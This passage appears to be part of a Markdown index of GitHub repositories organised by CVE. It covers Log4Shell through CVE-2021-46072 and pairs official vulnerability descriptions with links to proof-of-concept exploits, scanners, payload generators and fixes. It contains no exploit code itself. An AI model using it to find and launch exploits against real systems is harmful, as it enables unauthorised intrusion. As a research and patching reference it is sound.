- [Apipia/log4j-pcap-activity](https://github.com/Apipia/log4j-pcap-activity)
- [axelcurmi/log4shell-docker-lab](https://github.com/axelcurmi/log4shell-docker-lab)
- [otaviokr/log4j-2021-vulnerability-study](https://github.com/otaviokr/log4j-2021-vulnerability-study)
- [kkyehit/log4j_CVE-2021-44228](https://github.com/kkyehit/log4j_CVE-2021-44228)
- [trickyearlobe/inspec-log4j](https://github.com/trickyearlobe/inspec-log4j)
- [TheInterception/Log4J-Simulation-Tool](https://github.com/TheInterception/Log4J-Simulation-Tool)
- [KeysAU/Get-log4j-Windows-local](https://github.com/KeysAU/Get-log4j-Windows-local)
- [mschmnet/Log4Shell-demo](https://github.com/mschmnet/Log4Shell-demo)
- [Rk-000/Log4j_scan_Advance](https://github.com/Rk-000/Log4j_scan_Advance)
- [puzzlepeaches/Log4jCenter](https://github.com/puzzlepeaches/Log4jCenter)
- [Labout/log4shell-rmi-poc](https://github.com/Labout/log4shell-rmi-poc)
- [TotallyNotAHaxxer/f-for-java](https://github.com/TotallyNotAHaxxer/f-for-java)
- [spasam/log4j2-exploit](https://github.com/spasam/log4j2-exploit)
- [bumheehan/cve-2021-44228-log4j-test](https://github.com/bumheehan/cve-2021-44228-log4j-test)
- [cergo123/log4j-dork-scanner](https://github.com/cergo123/log4j-dork-scanner)
- [dmitsuo/log4shell-war-fixer](https://github.com/dmitsuo/log4shell-war-fixer)
- [Y0-kan/Log4jShell-Scan](https://github.com/Y0-kan/Log4jShell-Scan)
- [julian911015/Log4j-Scanner-Exploit](https://github.com/julian911015/Log4j-Scanner-Exploit)
- [intel-xeon/CVE-2021-44228---detection-with-PowerShell](https://github.com/intel-xeon/CVE-2021-44228---detection-with-PowerShell)
- [chandru-gunasekaran/log4j-fix-CVE-2021-44228](https://github.com/chandru-gunasekaran/log4j-fix-CVE-2021-44228)
- [erickrr-bd/TekiumLog4jApp](https://github.com/erickrr-bd/TekiumLog4jApp)
- [snapattack/damn-vulnerable-log4j-app](https://github.com/snapattack/damn-vulnerable-log4j-app)
- [sassoftware/loguccino](https://github.com/sassoftware/loguccino)
- [xx-zhang/apache-log4j2-CVE-2021-44228](https://github.com/xx-zhang/apache-log4j2-CVE-2021-44228)
- [r00thunter/Log4Shell-Scanner](https://github.com/r00thunter/Log4Shell-Scanner)
- [mn-io/log4j-spring-vuln-poc](https://github.com/mn-io/log4j-spring-vuln-poc)
- [rejupillai/log4j2-hack-springboot](https://github.com/rejupillai/log4j2-hack-springboot)
- [lucab85/log4j-cve-2021-44228](https://github.com/lucab85/log4j-cve-2021-44228)
- [BabooPan/Log4Shell-CVE-2021-44228-Demo](https://github.com/BabooPan/Log4Shell-CVE-2021-44228-Demo)
- [ossie-git/log4shell_sentinel](https://github.com/ossie-git/log4shell_sentinel)
- [r00thunter/Log4Shell](https://github.com/r00thunter/Log4Shell)
- [asyzdykov/cve-2021-44228-fix-jars](https://github.com/asyzdykov/cve-2021-44228-fix-jars)
- [BJLIYANLIANG/log4j-scanner](https://github.com/BJLIYANLIANG/log4j-scanner)
- [badb33f/Apache-Log4j-POC](https://github.com/badb33f/Apache-Log4j-POC)
- [TaroballzChen/CVE-2021-44228-log4jVulnScanner-metasploit](https://github.com/TaroballzChen/CVE-2021-44228-log4jVulnScanner-metasploit)
- [lucab85/ansible-role-log4shell](https://github.com/lucab85/ansible-role-log4shell)
- [grimch/log4j-CVE-2021-44228-workaround](https://github.com/grimch/log4j-CVE-2021-44228-workaround)
- [cybersecurityworks553/log4j-shell-csw](https://github.com/cybersecurityworks553/log4j-shell-csw)
- [Toolsec/log4j-scan](https://github.com/Toolsec/log4j-scan)
- [puzzlepeaches/Log4jUnifi](https://github.com/puzzlepeaches/Log4jUnifi)
- [many-fac3d-g0d/apache-tomcat-log4j](https://github.com/many-fac3d-g0d/apache-tomcat-log4j)
- [marcourbano/CVE-2021-44228](https://github.com/marcourbano/CVE-2021-44228)
- [bsigouin/log4shell-vulnerable-app](https://github.com/bsigouin/log4shell-vulnerable-app)
- [ToxicEnvelope/XSYS-Log4J2Shell-Ex](https://github.com/ToxicEnvelope/XSYS-Log4J2Shell-Ex)
- [felipe8398/ModSec-log4j2](https://github.com/felipe8398/ModSec-log4j2)
- [ceyhuncamli/Log4j_Attacker_IPList](https://github.com/ceyhuncamli/Log4j_Attacker_IPList)
- [mazhar-hassan/log4j-vulnerability](https://github.com/mazhar-hassan/log4j-vulnerability)
- [xungzzz/VTI-IOCs-CVE-2021-44228](https://github.com/xungzzz/VTI-IOCs-CVE-2021-44228)
- [s-retlaw/l4s_poc](https://github.com/s-retlaw/l4s_poc)
- [Ravid-CheckMarx/CVE-2021-44228-Apache-Log4j-Rce-main](https://github.com/Ravid-CheckMarx/CVE-2021-44228-Apache-Log4j-Rce-main)
- [yesspider-hacker/log4j-payload-generator](https://github.com/yesspider-hacker/log4j-payload-generator)
- [LinkMJB/log4shell_scanner](https://github.com/LinkMJB/log4shell_scanner)
- [NS-Sp4ce/Vm4J](https://github.com/NS-Sp4ce/Vm4J)
- [PoneyClairDeLune/LogJackFix](https://github.com/PoneyClairDeLune/LogJackFix)
- [MarceloLeite2604/log4j-vulnerability](https://github.com/MarceloLeite2604/log4j-vulnerability)
- [romanutti/log4shell-vulnerable-app](https://github.com/romanutti/log4shell-vulnerable-app)
- [mklinkj/log4j2-test](https://github.com/mklinkj/log4j2-test)
- [4jfinder/4jfinder.github.io](https://github.com/4jfinder/4jfinder.github.io)
- [alexpena5635/CVE-2021-44228_scanner-main-Modified-](https://github.com/alexpena5635/CVE-2021-44228_scanner-main-Modified-)
- [ChandanShastri/Log4j_Vulnerability_Demo](https://github.com/ChandanShastri/Log4j_Vulnerability_Demo)
- [puzzlepeaches/Log4jHorizon](https://github.com/puzzlepeaches/Log4jHorizon)
- [Vulnmachines/log4jshell_CVE-2021-44228](https://github.com/Vulnmachines/log4jshell_CVE-2021-44228)
- [mr-vill4in/log4j-fuzzer](https://github.com/mr-vill4in/log4j-fuzzer)
- [nix-xin/vuln4japi](https://github.com/nix-xin/vuln4japi)
- [maximofernandezriera/CVE-2021-44228](https://github.com/maximofernandezriera/CVE-2021-44228)
- [mebibite/log4jhound](https://github.com/mebibite/log4jhound)
- [jxerome/log4shell](https://github.com/jxerome/log4shell)
- [solitarysp/Log4j-CVE-2021-44228](https://github.com/solitarysp/Log4j-CVE-2021-44228)
- [sdogancesur/log4j_github_repository](https://github.com/sdogancesur/log4j_github_repository)
- [jrocia/Search-log4Jvuln-AppScanSTD](https://github.com/jrocia/Search-log4Jvuln-AppScanSTD)
- [aajuvonen/log4stdin](https://github.com/aajuvonen/log4stdin)
- [arnaudluti/PS-CVE-2021-44228](https://github.com/arnaudluti/PS-CVE-2021-44228)
- [ColdFusionX/CVE-2021-44228-Log4Shell-POC](https://github.com/ColdFusionX/CVE-2021-44228-Log4Shell-POC)
- [robrankin/cve-2021-44228-waf-tests](https://github.com/robrankin/cve-2021-44228-waf-tests)
- [0xalwayslucky/log4j-polkit-poc](https://github.com/0xalwayslucky/log4j-polkit-poc)
- [y-security/yLog4j](https://github.com/y-security/yLog4j)
- [FeryaelJustice/Log4Shell](https://github.com/FeryaelJustice/Log4Shell)
- [hotpotcookie/CVE-2021-44228-white-box](https://github.com/hotpotcookie/CVE-2021-44228-white-box)
- [s-retlaw/l4srs](https://github.com/s-retlaw/l4srs)
- [Ananya-0306/Log-4j-scanner](https://github.com/Ananya-0306/Log-4j-scanner)
- [paulvkitor/log4shellwithlog4j2_13_3](https://github.com/paulvkitor/log4shellwithlog4j2_13_3)
- [MiguelM001/vulescanjndilookup](https://github.com/MiguelM001/vulescanjndilookup)
- [Jun-5heng/CVE-2021-44228](https://github.com/Jun-5heng/CVE-2021-44228)
- [honypot/CVE-2021-44228](https://github.com/honypot/CVE-2021-44228)
- [honypot/CVE-2021-44228-vuln-app](https://github.com/honypot/CVE-2021-44228-vuln-app)
- [manishkanyal/log4j-scanner](https://github.com/manishkanyal/log4j-scanner)
- [TPower2112/Writing-Sample-1](https://github.com/TPower2112/Writing-Sample-1)
- [Willian-2-0-0-1/Log4j-Exploit-CVE-2021-44228](https://github.com/Willian-2-0-0-1/Log4j-Exploit-CVE-2021-44228)
- [r3kind1e/Log4Shell-obfuscated-payloads-generator](https://github.com/r3kind1e/Log4Shell-obfuscated-payloads-generator)
- [Phineas09/CVE-2021-44228](https://github.com/Phineas09/CVE-2021-44228)
- [yuuki1967/CVE-2021-44228-Apache-Log4j-Rce](https://github.com/yuuki1967/CVE-2021-44228-Apache-Log4j-Rce)
- [moshuum/tf-log4j-aws-poc](https://github.com/moshuum/tf-log4j-aws-poc)
- [jaehnri/CVE-2021-44228](https://github.com/jaehnri/CVE-2021-44228)
- [ra890927/Log4Shell-CVE-2021-44228-Demo](https://github.com/ra890927/Log4Shell-CVE-2021-44228-Demo)
- [vidrez/Ethical-Hacking-Report-Log4j](https://github.com/vidrez/Ethical-Hacking-Report-Log4j)
- [vino-theva/CVE-2021-44228](https://github.com/vino-theva/CVE-2021-44228)
- [tharindudh/tharindudh-Log4j-Vulnerability-in-Ghidra-tool-CVE-2021-44228](https://github.com/tharindudh/tharindudh-Log4j-Vulnerability-in-Ghidra-tool-CVE-2021-44228)
- [eurogig/jankybank](https://github.com/eurogig/jankybank)
- [digital-dev/Log4j-CVE-2021-44228-Remediation](https://github.com/digital-dev/Log4j-CVE-2021-44228-Remediation)
- [ocastel/log4j-shell-poc](https://github.com/ocastel/log4j-shell-poc)
- [bcdunbar/CVE-2021-44228-poc](https://github.com/bcdunbar/CVE-2021-44228-poc)
- [srcporter/CVE-2021-44228](https://github.com/srcporter/CVE-2021-44228)
- [Nexolanta/log4j2_CVE-2021-44228](https://github.com/Nexolanta/log4j2_CVE-2021-44228)
- [demining/Log4j-Vulnerability](https://github.com/demining/Log4j-Vulnerability)
- [pierpaolosestito-dev/Log4Shell-CVE-2021-44228-PoC](https://github.com/pierpaolosestito-dev/Log4Shell-CVE-2021-44228-PoC)
- [Sma-Das/Log4j-PoC](https://github.com/Sma-Das/Log4j-PoC)
- [53buahapel/log4shell-vulnweb](https://github.com/53buahapel/log4shell-vulnweb)
- [demonrvm/Log4ShellRemediation](https://github.com/demonrvm/Log4ShellRemediation)
- [funcid/log4j-exploit-fork-bomb](https://github.com/funcid/log4j-exploit-fork-bomb)
- [MrHarshvardhan/PY-Log4j-RCE-Scanner](https://github.com/MrHarshvardhan/PY-Log4j-RCE-Scanner)
- [Muhammad-Ali007/Log4j_CVE-2021-44228](https://github.com/Muhammad-Ali007/Log4j_CVE-2021-44228)
- [Tai-e/CVE-2021-44228](https://github.com/Tai-e/CVE-2021-44228)
- [LucasPDiniz/CVE-2021-44228](https://github.com/LucasPDiniz/CVE-2021-44228)
- [felixslama/log4shell-minecraft-demo](https://github.com/felixslama/log4shell-minecraft-demo)
- [ShlomiRex/log4shell_lab](https://github.com/ShlomiRex/log4shell_lab)
- [dcm2406/CVE-Lab](https://github.com/dcm2406/CVE-Lab)
- [scabench/l4j-tp1](https://github.com/scabench/l4j-tp1)
- [scabench/l4j-fp1](https://github.com/scabench/l4j-fp1)
- [KtokKawu/l4s-vulnapp](https://github.com/KtokKawu/l4s-vulnapp)
- [sec13b/CVE-2021-44228-POC](https://github.com/sec13b/CVE-2021-44228-POC)
- [KirkDJohnson/Wireshark](https://github.com/KirkDJohnson/Wireshark)
- [YangHyperData/LOGJ4_PocShell_CVE-2021-44228](https://github.com/YangHyperData/LOGJ4_PocShell_CVE-2021-44228)
- [Hoanle396/CVE-2021-44228-demo](https://github.com/Hoanle396/CVE-2021-44228-demo)
- [tadash10/Exploiting-CVE-2021-44228-Log4Shell-in-a-Banking-Environment](https://github.com/tadash10/Exploiting-CVE-2021-44228-Log4Shell-in-a-Banking-Environment)
- [asd58584388/CVE-2021-44228](https://github.com/asd58584388/CVE-2021-44228)
- [OtisSymbos/CVE-2021-44228-Log4Shell-](https://github.com/OtisSymbos/CVE-2021-44228-Log4Shell-)
- [safeer-accuknox/log4j-shell-poc](https://github.com/safeer-accuknox/log4j-shell-poc)
- [Carlos-Mesquita/TPASLog4ShellPoC](https://github.com/Carlos-Mesquita/TPASLog4ShellPoC)
### CVE-2021-44255 (2022-01-31)
Authenticated remote code execution in MotionEye <= 0.42.1 and MotioneEyeOS <= 20200606 allows a remote attacker to upload a configuration backup file containing a malicious python pickle file which will execute arbitrary code on the server.
- [pizza-power/motioneye-authenticated-RCE](https://github.com/pizza-power/motioneye-authenticated-RCE)
### CVE-2021-44270
- [pinpinsec/CVE-2021-44270](https://github.com/pinpinsec/CVE-2021-44270)
### CVE-2021-44428 (2021-11-29)
Pinkie 2.15 allows remote attackers to cause a denial of service (daemon crash) via a TFTP read (RRQ) request, aka opcode 1.
- [z3bul0n/log4jtest](https://github.com/z3bul0n/log4jtest)
### CVE-2021-44521 (2022-02-11)
When running Apache Cassandra with the following configuration: enable_user_defined_functions: true enable_scripted_user_defined_functions: true enable_user_defined_functions_threads: false it is possible for an attacker to execute arbitrary code on the host. The attacker would need to have enough permissions to create user defined functions in the cluster to be able to exploit this. Note that this configuration is documented as unsafe, and will continue to be considered unsafe after this CVE.
- [WoodenKlaas/CVE-2021-44521](https://github.com/WoodenKlaas/CVE-2021-44521)
- [Yeyvo/poc-CVE-2021-44521](https://github.com/Yeyvo/poc-CVE-2021-44521)
### CVE-2021-44529 (2021-12-08)
A code injection vulnerability in the Ivanti EPM Cloud Services Appliance (CSA) allows an unauthenticated user to execute arbitrary code with limited permissions (nobody).
- [jkana/CVE-2021-44529](https://github.com/jkana/CVE-2021-44529)
- [jax7sec/CVE-2021-44529](https://github.com/jax7sec/CVE-2021-44529)
### CVE-2021-44582 (2022-06-10)
A Privilege Escalation vulnerability exists in Sourcecodester Money Transfer Management System 1.0, which allows a remote malicious user to gain elevated privileges to the Admin role via any URL.
- [warmachine-57/CVE-2021-44582](https://github.com/warmachine-57/CVE-2021-44582)
### CVE-2021-44593 (2022-01-21)
Simple College Website 1.0 is vulnerable to unauthenticated file upload & remote code execution via UNION-based SQL injection in the username parameter on /admin/login.php.
- [Mister-Joe/CVE-2021-44593](https://github.com/Mister-Joe/CVE-2021-44593)
### CVE-2021-44731 (2022-02-17)
A race condition existed in the snapd 2.54.2 snap-confine binary when preparing a private mount namespace for a snap. This could allow a local attacker to gain root privileges by bind-mounting their own contents inside the snap's private mount namespace and causing snap-confine to execute arbitrary code and hence gain privilege escalation. Fixed in snapd versions 2.54.3+18.04, 2.54.3+20.04 and 2.54.3+21.10.1
- [deeexcee-io/CVE-2021-44731-snap-confine-SUID](https://github.com/deeexcee-io/CVE-2021-44731-snap-confine-SUID)
### CVE-2021-44733 (2021-12-22)
A use-after-free exists in drivers/tee/tee_shm.c in the TEE subsystem in the Linux kernel through 5.15.11. This occurs because of a race condition in tee_shm_get_from_id during an attempt to free a shared memory object.
- [pjlantz/optee-qemu](https://github.com/pjlantz/optee-qemu)
### CVE-2021-44790 (2021-12-20)
A carefully crafted request body can cause a buffer overflow in the mod_lua multipart parser (r:parsebody() called from Lua scripts). The Apache httpd team is not aware of an exploit for the vulnerabilty though it might be possible to craft one. This issue affects Apache HTTP Server 2.4.51 and earlier.
- [nuPacaChi/-CVE-2021-44790](https://github.com/nuPacaChi/-CVE-2021-44790)
### CVE-2021-44827 (2022-03-04)
There is remote authenticated OS command injection on TP-Link Archer C20i 0.9.1 3.2 v003a.0 Build 170221 Rel.55462n devices vie the X_TP_ExternalIPv6Address HTTP parameter, allowing a remote attacker to run arbitrary commands on the router with root privileges.
- [full-disclosure/CVE-2021-44827](https://github.com/full-disclosure/CVE-2021-44827)
### CVE-2021-44832 (2021-12-28)
Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding security fix releases 2.3.2 and 2.12.4) are vulnerable to a remote code execution (RCE) attack when a configuration uses a JDBC Appender with a JNDI LDAP data source URI when an attacker has control of the target LDAP server. This issue is fixed by limiting JNDI data source names to the java protocol in Log4j2 versions 2.17.1, 2.12.4, and 2.3.2.
- [cckuailong/log4j_RCE_CVE-2021-44832](https://github.com/cckuailong/log4j_RCE_CVE-2021-44832)
- [name/log4j-scanner](https://github.com/name/log4j-scanner)
### CVE-2021-44852 (2022-01-01)
An issue was discovered in BS_RCIO64.sys in Biostar RACING GT Evo 2.1.1905.1700. A low-integrity process can open the driver's device object and issue IOCTLs to read or write to arbitrary physical memory locations (or call an arbitrary address), leading to execution of arbitrary code. This is associated with 0x226040, 0x226044, and 0x226000.
- [CrackerCat/CVE-2021-44852](https://github.com/CrackerCat/CVE-2021-44852)
### CVE-2021-44906 (2022-03-17)
Minimist <=1.2.5 is vulnerable to Prototype Pollution via file index.js, function setKey() (lines 69-95).
- [nevermoe/CVE-2021-44906](https://github.com/nevermoe/CVE-2021-44906)
### CVE-2021-44909
- [g1thub3r1st4/CVE-2021-44909](https://github.com/g1thub3r1st4/CVE-2021-44909)
### CVE-2021-44910
- [W000i/CVE-2021-44910_SpringBlade](https://github.com/W000i/CVE-2021-44910_SpringBlade)
### CVE-2021-45007 (2022-02-20)
Plesk 18.0.37 is affected by a Cross Site Request Forgery (CSRF) vulnerability that allows an attacker to insert data on the user and admin panel. NOTE: the vendor states that this is only a site-specific problem on websites of one or more Plesk users
- [AS4mir/CVE-2021-45007](https://github.com/AS4mir/CVE-2021-45007)
### CVE-2021-45008 (2022-02-21)
Plesk CMS 18.0.37 is affected by an insecure permissions vulnerability that allows privilege Escalation from user to admin rights. OTE: the vendor states that this is only a site-specific problem on websites of one or more Plesk users
- [AS4mir/CVE-2021-45008](https://github.com/AS4mir/CVE-2021-45008)
### CVE-2021-45010 (2022-03-15)
A path traversal vulnerability in the file upload functionality in tinyfilemanager.php in Tiny File Manager before 2.4.7 allows remote attackers (with valid user accounts) to upload malicious PHP files to the webroot, leading to code execution.
- [febinrev/CVE-2021-45010-TinyFileManager-Exploit](https://github.com/febinrev/CVE-2021-45010-TinyFileManager-Exploit)
- [BKreisel/CVE-2021-45010](https://github.com/BKreisel/CVE-2021-45010)
- [Syd-SydneyJr/CVE-2021-45010](https://github.com/Syd-SydneyJr/CVE-2021-45010)
### CVE-2021-45026 (2022-06-17)
ASG technologies ASG-Zena Cross Platform Server Enterprise Edition 4.2.1 is vulnerable to Cross Site Scripting (XSS).
- [JetP1ane/Zena-CVE-2021-45026](https://github.com/JetP1ane/Zena-CVE-2021-45026)
### CVE-2021-45041 (2021-12-19)
SuiteCRM before 7.12.2 and 8.x before 8.0.1 allows authenticated SQL injection via the Tooltips action in the Project module, involving resource_id and start_date.
- [manuelz120/CVE-2021-45041](https://github.com/manuelz120/CVE-2021-45041)
### CVE-2021-45043 (2021-12-15)
HD-Network Real-time Monitoring System 2.0 allows ../ directory traversal to read /etc/shadow via the /language/lang s_Language parameter.
- [crypt0g30rgy/cve-2021-45043](https://github.com/crypt0g30rgy/cve-2021-45043)
### CVE-2021-45046 (2021-12-14)
It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allows attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC) to craft malicious input data using a JNDI Lookup pattern resulting in an information leak and remote code execution in some environments and local code execution in all environments. Log4j 2.16.0 (Java 8) and 2.12.2 (Java 7) fix this issue by removing support for message lookup patterns and disabling JNDI functionality by default.
- [cckuailong/Log4j_CVE-2021-45046](https://github.com/cckuailong/Log4j_CVE-2021-45046)
- [BobTheShoplifter/CVE-2021-45046-Info](https://github.com/BobTheShoplifter/CVE-2021-45046-Info)
- [tejas-nagchandi/CVE-2021-45046](https://github.com/tejas-nagchandi/CVE-2021-45046)
- [pravin-pp/log4j2-CVE-2021-45046](https://github.com/pravin-pp/log4j2-CVE-2021-45046)
- [mergebase/log4j-samples](https://github.com/mergebase/log4j-samples)
- [lukepasek/log4jjndilookupremove](https://github.com/lukepasek/log4jjndilookupremove)
- [ludy-dev/cve-2021-45046](https://github.com/ludy-dev/cve-2021-45046)
- [lijiejie/log4j2_vul_local_scanner](https://github.com/lijiejie/log4j2_vul_local_scanner)
- [CaptanMoss/Log4Shell-Sandbox-Signature](https://github.com/CaptanMoss/Log4Shell-Sandbox-Signature)
- [shaily29-eng/CyberSecurity_CVE-2021-45046](https://github.com/shaily29-eng/CyberSecurity_CVE-2021-45046)
### CVE-2021-45067 (2022-01-14)
Acrobat Reader DC version 21.007.20099 (and earlier), 20.004.30017 (and earlier) and 17.011.30204 (and earlier) are affected by an Access of Memory Location After End of Buffer vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.
- [hacksysteam/CVE-2021-45067](https://github.com/hacksysteam/CVE-2021-45067)
### CVE-2021-45105 (2021-12-18)
Apache Log4j2 versions 2.0-alpha1 through 2.16.0 (excluding 2.12.3 and 2.3.1) did not protect from uncontrolled recursion from self-referential lookups. This allows an attacker with control over Thread Context Map data to cause a denial of service when a crafted string is interpreted. This issue was fixed in Log4j 2.17.0, 2.12.3, and 2.3.1.
- [cckuailong/Log4j_dos_CVE-2021-45105](https://github.com/cckuailong/Log4j_dos_CVE-2021-45105)
- [pravin-pp/log4j2-CVE-2021-45105](https://github.com/pravin-pp/log4j2-CVE-2021-45105)
- [tejas-nagchandi/CVE-2021-45105](https://github.com/tejas-nagchandi/CVE-2021-45105)
- [iAmSOScArEd/log4j2_dos_exploit](https://github.com/iAmSOScArEd/log4j2_dos_exploit)
- [dileepdkumar/https-github.com-pravin-pp-log4j2-CVE-2021-45105](https://github.com/dileepdkumar/https-github.com-pravin-pp-log4j2-CVE-2021-45105)
- [dileepdkumar/https-github.com-dileepdkumar-https-github.com-pravin-pp-log4j2-CVE-2021-45105](https://github.com/dileepdkumar/https-github.com-dileepdkumar-https-github.com-pravin-pp-log4j2-CVE-2021-45105)
- [dileepdkumar/https-github.com-dileepdkumar-https-github.com-pravin-pp-log4j2-CVE-2021-45105-v](https://github.com/dileepdkumar/https-github.com-dileepdkumar-https-github.com-pravin-pp-log4j2-CVE-2021-45105-v)
- [dileepdkumar/https-github.com-pravin-pp-log4j2-CVE-2021-45105-1](https://github.com/dileepdkumar/https-github.com-pravin-pp-log4j2-CVE-2021-45105-1)
- [name/log4j-remediation](https://github.com/name/log4j-remediation)
### CVE-2021-45232 (2021-12-27)
In Apache APISIX Dashboard before 2.10.1, the Manager API uses two frameworks and introduces framework `droplet` on the basis of framework `gin`, all APIs and authentication middleware are developed based on framework `droplet`, but some API directly use the interface of framework `gin` thus bypassing the authentication.
- [Osyanina/westone-CVE-2021-45232-scanner](https://github.com/Osyanina/westone-CVE-2021-45232-scanner)
- [badboycxcc/CVE-2021-45232-POC](https://github.com/badboycxcc/CVE-2021-45232-POC)
- [LTiDi2000/CVE-2021-45232](https://github.com/LTiDi2000/CVE-2021-45232)
- [Ilovewomen/cve-2021-45232](https://github.com/Ilovewomen/cve-2021-45232)
- [jxpsx/CVE-2021-45232-RCE](https://github.com/jxpsx/CVE-2021-45232-RCE)
- [wuppp/cve-2021-45232-exp](https://github.com/wuppp/cve-2021-45232-exp)
- [dskho/CVE-2021-45232](https://github.com/dskho/CVE-2021-45232)
- [GYLQ/CVE-2021-45232-RCE](https://github.com/GYLQ/CVE-2021-45232-RCE)
- [fany0r/CVE-2021-45232-RCE](https://github.com/fany0r/CVE-2021-45232-RCE)
- [yggcwhat/CVE-2021-45232](https://github.com/yggcwhat/CVE-2021-45232)
- [YutuSec/Apisix_Crack](https://github.com/YutuSec/Apisix_Crack)
### CVE-2021-45416 (2022-02-01)
Reflected Cross-site scripting (XSS) vulnerability in RosarioSIS 8.2.1 allows attackers to inject arbitrary HTML via the search_term parameter in the modules/Scheduling/Courses.php script.
- [86x/CVE-2021-45416](https://github.com/86x/CVE-2021-45416)
- [dnr6419/CVE-2021-45416](https://github.com/dnr6419/CVE-2021-45416)
### CVE-2021-45428 (2022-01-03)
TLR-2005KSH is affected by an incorrect access control vulnerability. THe PUT method is enabled so an attacker can upload arbitrary files including HTML and CGI formats.
- [projectforsix/CVE-2021-45428-Defacer](https://github.com/projectforsix/CVE-2021-45428-Defacer)
### CVE-2021-45468 (2022-01-14)
Imperva Web Application Firewall (WAF) before 2021-12-23 allows remote unauthenticated attackers to use "Content-Encoding: gzip" to evade WAF security controls and send malicious HTTP POST requests to web servers behind the WAF.
- [0xhaggis/Imperva_gzip_bypass](https://github.com/0xhaggis/Imperva_gzip_bypass)
### CVE-2021-45485 (2021-12-25)
In the IPv6 implementation in the Linux kernel before 5.13.3, net/ipv6/output_core.c has an information leak because of certain use of a hash table which, although big, doesn't properly consider that IPv6-based attackers can typically choose among many IPv6 source addresses.
- [Satheesh575555/linux-4.19.72_CVE-2021-45485](https://github.com/Satheesh575555/linux-4.19.72_CVE-2021-45485)
### CVE-2021-45744 (2022-01-06)
A Stored Cross Site Scripting (XSS) vulnerability exists in bludit 3.13.1 via the TAGS section in login panel.
- [plsanu/Bludit-3.13.1-TAGS-Field-Stored-Cross-Site-Scripting-XSS](https://github.com/plsanu/Bludit-3.13.1-TAGS-Field-Stored-Cross-Site-Scripting-XSS)
- [plsanu/CVE-2021-45744](https://github.com/plsanu/CVE-2021-45744)
### CVE-2021-45745 (2022-01-06)
A Stored Cross Site Scripting (XSS) vulnerability exists in Bludit 3.13.1 via the About Plugin in login panel.
- [plsanu/Bludit-3.13.1-About-Plugin-Stored-Cross-Site-Scripting-XSS](https://github.com/plsanu/Bludit-3.13.1-About-Plugin-Stored-Cross-Site-Scripting-XSS)
- [plsanu/CVE-2021-45745](https://github.com/plsanu/CVE-2021-45745)
### CVE-2021-45897 (2022-01-28)
SuiteCRM before 7.12.3 and 8.x before 8.0.2 allows remote code execution.
- [manuelz120/CVE-2021-45897](https://github.com/manuelz120/CVE-2021-45897)
### CVE-2021-45901 (2022-02-10)
The password-reset form in ServiceNow Orlando provides different responses to invalid authentication attempts depending on whether the username exists.
- [9lyph/CVE-2021-45901](https://github.com/9lyph/CVE-2021-45901)
### CVE-2021-45960 (2022-01-01)
In Expat (aka libexpat) before 2.4.3, a left shift by 29 (or more) places in the storeAtts function in xmlparse.c can lead to realloc misbehavior (e.g., allocating too few bytes, or only freeing memory).
- [nanopathi/external_expat_AOSP10_r33_CVE-2021-45960](https://github.com/nanopathi/external_expat_AOSP10_r33_CVE-2021-45960)
- [Trinadh465/external_lib_AOSP10_r33_CVE-2021-45960_CVE-2021-46143-](https://github.com/Trinadh465/external_lib_AOSP10_r33_CVE-2021-45960_CVE-2021-46143-)
- [hshivhare67/external_expat_v2.2.6_CVE-2021-45960](https://github.com/hshivhare67/external_expat_v2.2.6_CVE-2021-45960)
### CVE-2021-46005 (2022-01-18)
Sourcecodester Car Rental Management System 1.0 is vulnerable to Cross Site Scripting (XSS) via vehicalorcview parameter.
- [nawed20002/CVE-2021-46005](https://github.com/nawed20002/CVE-2021-46005)
### CVE-2021-46063 (2022-02-18)
MCMS v5.2.5 was discovered to contain a Server Side Template Injection (SSTI) vulnerability via the Template Management module.
- [miguelc49/CVE-2021-46063-2](https://github.com/miguelc49/CVE-2021-46063-2)
- [miguelc49/CVE-2021-46063-1](https://github.com/miguelc49/CVE-2021-46063-1)
- [miguelc49/CVE-2021-46063-3](https://github.com/miguelc49/CVE-2021-46063-3)
### CVE-2021-46067 (2022-01-06)
In Vehicle Service Management System 1.0 an attacker can steal the cookies leading to Full Account Takeover.
- [plsanu/Vehicle-Service-Management-System-Multiple-Cookie-Stealing-Leads-to-Full-Account-Takeover](https://github.com/plsanu/Vehicle-Service-Management-System-Multiple-Cookie-Stealing-Leads-to-Full-Account-Takeover)
- [plsanu/CVE-2021-46067](https://github.com/plsanu/CVE-2021-46067)
### CVE-2021-46068 (2022-01-06)
A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the My Account Section in login panel.
- [plsanu/Vehicle-Service-Management-System-MyAccount-Stored-Cross-Site-Scripting-XSS](https://github.com/plsanu/Vehicle-Service-Management-System-MyAccount-Stored-Cross-Site-Scripting-XSS)
- [plsanu/CVE-2021-46068](https://github.com/plsanu/CVE-2021-46068)
### CVE-2021-46069 (2022-01-06)
A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Mechanic List Section in login panel.
- [plsanu/Vehicle-Service-Management-System-Mechanic-List-Stored-Cross-Site-Scripting-XSS](https://github.com/plsanu/Vehicle-Service-Management-System-Mechanic-List-Stored-Cross-Site-Scripting-XSS)
- [plsanu/CVE-2021-46069](https://github.com/plsanu/CVE-2021-46069)
### CVE-2021-46070 (2022-01-06)
A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Service Requests Section in login panel.
- [plsanu/Vehicle-Service-Management-System-Service-Requests-Stored-Cross-Site-Scripting-XSS](https://github.com/plsanu/Vehicle-Service-Management-System-Service-Requests-Stored-Cross-Site-Scripting-XSS)
- [plsanu/CVE-2021-46070](https://github.com/plsanu/CVE-2021-46070)
### CVE-2021-46071 (2022-01-06)
A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Category List Section in login panel.
- [plsanu/Vehicle-Service-Management-System-Category-List-Stored-Cross-Site-Scripting-XSS](https://github.com/plsanu/Vehicle-Service-Management-System-Category-List-Stored-Cross-Site-Scripting-XSS)
- [plsanu/CVE-2021-46071](https://github.com/plsanu/CVE-2021-46071)
### CVE-2021-46072 (2022-01-06)
A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Service List Section in login panel.
